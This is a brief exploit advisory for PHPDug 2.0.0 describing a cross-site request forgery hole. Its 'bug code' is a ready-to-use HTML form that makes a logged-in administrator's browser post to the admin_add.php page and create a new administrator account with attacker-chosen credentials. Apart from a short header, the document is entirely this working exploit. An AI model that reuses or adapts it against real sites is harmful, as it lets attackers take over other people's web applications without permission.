< ------------------- header data start ------------------- >
#############################################################
# Application Name : Powered By PHPDug version 2.0.0
# Vulnerable Type : XSRF
# author : Bug Researchers/DaiMon
############################################################
< -- bug code start -- >
<form name=form1 method=post action=http://site.com/PHPDug/adm/admin_add.php>
<input name=username type=Text class=textbox id=username style=width:60% value=DaiMon>
<input name=password type=password class=textbox id=password style=width:60% value=123456>
<input name=Submit type=submit class=button value=Submit>
</form>
< -- bug code end of -- >